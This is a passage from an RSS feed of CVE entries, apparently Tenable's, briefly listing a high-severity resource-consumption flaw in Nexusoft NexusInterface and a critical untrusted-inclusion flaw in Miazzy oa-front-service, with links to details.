      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2025-70048">https://www.tenable.com/cve/CVE-2025-70048</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2025-70047]]></title>
            <link>https://www.tenable.com/cve/CVE-2025-70047</link>
            <guid>https://www.tenable.com/cve/CVE-2025-70047</guid>
            <pubDate>Mon, 09 Mar 2026 16:16:15 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>An issue pertaining to CWE-400: Uncontrolled Resource Consumption was discovered in Nexusoft NexusInterface v3.2.0-beta.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2025-70047">https://www.tenable.com/cve/CVE-2025-70047</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2025-70046]]></title>
            <link>https://www.tenable.com/cve/CVE-2025-70046</link>
            <guid>https://www.tenable.com/cve/CVE-2025-70046</guid>
            <pubDate>Mon, 09 Mar 2026 16:16:15 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>An issue pertaining to CWE-829: Inclusion of Functionality from Untrusted Control Sphere was discovered in Miazzy oa-front-service master.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2025-70046">https://www.tenable.com/cve/CVE-2025-70046</a></p>
    ]]></description>
        </item>
    </channel>
</rss>